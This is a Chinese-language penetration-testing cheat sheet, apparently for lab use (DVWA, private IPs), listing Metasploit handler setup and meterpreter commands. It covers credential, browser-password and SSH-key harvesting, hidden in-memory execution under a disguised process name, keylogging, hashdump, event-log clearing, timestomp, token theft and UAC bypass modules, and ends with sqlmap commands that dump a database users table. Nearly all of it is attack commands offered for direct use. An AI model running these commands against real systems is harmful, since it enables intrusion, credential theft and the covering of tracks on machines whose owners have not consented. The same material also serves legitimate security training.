msfnevom
msf exploit(psexec) > use exploit/multi/handler
msf exploit(handler) > set exitonsession false 运行这条命令后,4444端口会一直处于侦听状态
msf exploit(handler) > exploit -j -z
meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.80.0/24
meterpreter > run post/windows/gather/credentials/credential_collector 目标主机上的身份认证信息
meterpreter > run post/windows/gather/enum_applications 目标主机安装了哪些软件
meterpreter > run post/windows/gather/enum_logged_on_users 目标主机当前在线的用户(SID=500是管理员账号)
meterpreter > run post/windows/gather/enum_snmp 枚举snmp信息
meterpreter > run post/multi/recon/local_exploit_suggester 目标主机存在哪些本地提权漏洞
meterpreter > run post/windows/manage/delete_user USERNAME=a 删除目标主机的a账号
meterpreter > run post/multi/gather/env 目标主机环境变量信息
meterpreter > run post/multi/gather/firefox_creds 目标主机火狐浏览器保存的账号密码
meterpreter > run post/multi/gather/ssh_creds 目标主机保存的ssh身份验证信息(linux系统常用)
meterpreter命令执行
upload - 上传文件
上传exe到目标靶机c:\ls\下
upload 1.exe c:\\ls\\
下载目标靶机相对应权限的任意路径下的文件
download -
命令 download file path
download c:\\ls\\1.exe
sysinfo 命令
显示远程主机的系统信息,显示计算机、系统信息、结构、语言等信息。
运行目标主机上的cmd.exe程序,以隐藏的方式直接交互到meterpreter会话上
execute -H -i -f cmd.exe
execute -H -m -d notepad.exe -f 1.exe -a "-o 2.txt"
#-d 在目标主机执行时显示的进程名称(用以伪装)
#-m 直接从内存中执行
#"-o 2.txt"1.exe的运行参数
portfwd 命令:
# 端口转发,本机监听yyyy,把目标机zzzz转到本机yyyy
portfwd add -l yyyy -p zzzz -r 192.168.xxx.xxx
#查看指定端口开放情况
netstat -an | grep"yyyy"
核心命令 – 帮助菜单
background – 将当前会话移动到背景变成一个session,当再次使用时再用sessions -i ID调用
bgkill – 杀死一个背景 meterpreter 脚本
bglist – 提供所有正在运行的后台脚本的列表
bgrun – 作为一个后台线程运行脚本
channel – 显示活动频道
close – 关闭通道
exit – 终止 meterpreter 会话
help – 帮助菜单
interact – 与通道进行交互
irb – 进入 Ruby 脚本模式
migrate – 移动到一个指定的 PID 的活动进程
quit – 终止 meterpreter 会话
read – 从通道读取数据
run – 执行以后它选定的 meterpreter 脚本
use – 加载 meterpreter 的扩展
write – 将数据写入到一个通道
文件系统命令
cat -读取并输出到标准输出文件的内容
cd -更改目录对受害人
del -删除文件对受害人
rm -删除文件
rmdir -受害者系统上删除目录
upload-从攻击者的系统往受害者系统上传文件
download-从受害者系统文件下载
edit-用 vim编辑文件
getlwd -打印本地目录
getwd -打印工作目录
lcd -更改本地目录
lpwd -打印本地目录
ls -列出在当前目录中的文件列表
mkdir -在受害者系统上的创建目录
pwd -输出工作目录
网络命令
portfwd -端口转发
route -查看或修改受害者路由表
系统命令
clearev -清除了受害者的计算机上的事件日志
drop_token -被盗的令牌
execute-执行命令
getpid -获取当前进程 ID (PID)
getprivs -尽可能获取尽可能多的特权
getuid -获取作为运行服务器的用户
kill -终止指定 PID 的进程
ps -列出正在运行的进程
reboot-重新启动受害人的计算机
reg -与受害人的注册表进行交互
rev2self -在受害者机器上调用 RevertToSelf()
shell -在受害者计算机上打开一个shell
shutdown-关闭了受害者的计算机
steal_token -试图窃取指定的 (PID) 进程的令牌
sysinfo -获取有关受害者计算机操作系统和名称等的详细信息
用户界面命令
enumdesktops -列出所有可访问台式机
getdesktop -获取当前的 meterpreter 桌面
idletime -检查长时间以来,受害者系统空闲进程
keyscan_dump -键盘记录软件的内容转储
keyscan_start -启动时与如 Word 或浏览器的进程相关联的键盘记录软件
keyscan_stop -停止键盘记录软件
screenshot-抓去 meterpreter 桌面的屏幕截图
set_desktop -更改 meterpreter 桌面
uictl -启用用户界面组件的一些控件
特权升级命令
getsystem -获得系统管理员权限
密码转储命令
hashdump -抓去哈希密码 (SAM) 文件中的值
Timestomp 命令
timestomp -操作修改,访问,并创建一个文件的属性
提权漏洞:
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
use windows/local/bypassuac_vbs
use windows/local/ask
sqlmap
具有php查询数据库的语句
查询是否有sql注入
"sqlmap -u http://127.0.0.1/1.php?id=1"
查询数据库名称
sqlmap -u "url" --dbs
sqlmap -u "http://127.0.0.1/1.php?id=1" --dbs
获取数据库中表名称
sqlmap -u "url" U -D "数据库名称" --tables;
sqlmap -u "http://127.0.0.1/1.php?id=1" U -D "dvwa" --tables;
获取字段名称
sqlmap -u "url" -D "数据库名称" -T "数据表名称" --columns
sqlmap -u "http://127.0.0.1/1.php?id=1" -D "dvwa" -T "users" --columns
获取数据信息
sqlmap -u "url" -D "数据库名称" -T "数据表名称" -C "字段名称" --dump
sqlmap -u "http://127.0.0.1/1.php?id=1" -D "dvwa" -T "users" -C "user" --dump